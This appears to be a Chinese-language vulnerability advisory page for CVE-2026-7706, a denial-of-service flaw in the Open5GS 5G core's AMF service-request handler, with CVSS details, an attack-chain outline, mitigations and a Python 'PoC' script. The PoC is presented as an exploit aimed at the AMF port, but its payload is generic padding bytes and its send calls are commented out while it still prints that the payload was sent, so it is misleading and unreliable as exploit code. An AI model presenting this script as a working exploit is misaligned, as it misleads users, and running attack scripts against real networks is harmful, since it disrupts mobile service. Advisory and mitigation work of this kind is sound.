CVE-2026-7706 Open5GS拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-7706

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS是开源的5G核心网实现。在版本2.7.7及之前版本中，AMF组件的/src/amf/gmm-handler.c文件内的gmm_handle_service_request函数存在漏洞。攻击者可通过网络远程利用该漏洞，通过特定操作导致目标服务拒绝响应（DoS）。该漏洞利用难度较低，无需用户交互，且已有公开的利用代码披露，目前厂商尚未发布修复补丁。

技术细节

该漏洞位于Open5GS的接入和移动性管理功能（AMF）组件中。具体问题出在处理GMM（GPRS移动性管理）服务请求的函数`gmm_handle_service_request`中。由于代码在处理特定输入时缺乏充分的边界检查或状态验证，攻击者可以构造恶意的NAS（非接入层）消息发送至AMF。当AMF尝试解析并处理该异常消息时，会触发逻辑错误导致进程崩溃或资源耗尽，从而破坏核心网的可用性。攻击向量为网络（AV:N），攻击复杂度低（AC:L），所需权限为低权限（PR:L）。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出运行Open5GS的目标系统，特别是暴露的AMF组件接口（通常为SCTP端口38412）。

STEP 2

2. 漏洞利用

攻击者利用低权限账户接入网络，构造特制的NAS Service Request数据包，发送给目标AMF的`gmm_handle_service_request`函数。

STEP 3

3. 触发崩溃

AMF在处理恶意数据包时，由于代码逻辑缺陷（如空指针引用或内存错误）导致进程异常终止。

STEP 4

4. 拒绝服务

由于AMF负责接入和移动性管理，其崩溃导致核心网无法处理新的连接请求或切换请求，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# PoC for CVE-2026-7706 (Open5GS DoS)
# This script sends a crafted packet to trigger the crash in gmm_handle_service_request
# Note: Open5GS AMF typically uses SCTP, this is a simplified demonstration.

def send_exploit(target_ip, target_port):
    # Constructing a malformed NAS Service Request payload
    # This payload is designed to hit the vulnerable logic in gmm-handler.c
    # Specific bytes may vary based on the exact vulnerability trigger
    
    # NAS Message Header (Security protected NAS message placeholder)
    nas_header = b'\x7e' # Protocol Discriminator: Mobility Management messages
    nas_header += b'\x00' # Security header type: Plain NAS message
    
    # Malformed Service Request content
    # Triggering the invalid access in the target function
    payload = nas_header + b'\x0c' * 100 # Filling with padding/junk data

    try:
        # Attempting to connect to the AMF interface (Port 38412 is standard for N2/SCTP)
        # This example uses TCP for simplicity, actual exploit requires SCTP association
        print(f"[*] Sending exploit payload to {target_ip}:{target_port}")
        
        # In a real scenario, use pysctp or similar to send over SCTP
        # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # sock.connect((target_ip, target_port))
        # sock.send(payload)
        # sock.close()
        
        print("[+] Payload sent. Check if AMF crashed.")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target IP
    target = "192.168.1.100"
    port = 38412
    send_exploit(target, port)

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

由于厂商目前尚未发布修复补丁，建议采取以下临时缓解措施：限制对AMF端口的网络访问，使用防火墙规则仅允许受信任的基站设备IP进行连接；加强对核心网流量的监控，及时阻断异常的请求模式；定期备份配置并准备快速恢复方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7706
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7706
3 Details https://www.cvedetails.com/cve/CVE-2026-7706/
4 VulDB https://vuldb.com/cve/CVE-2026-7706
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4409
7 Link https://vuldb.com/submit/805698
8 Link https://vuldb.com/vuln/360882
9 Link https://vuldb.com/vuln/360882/cti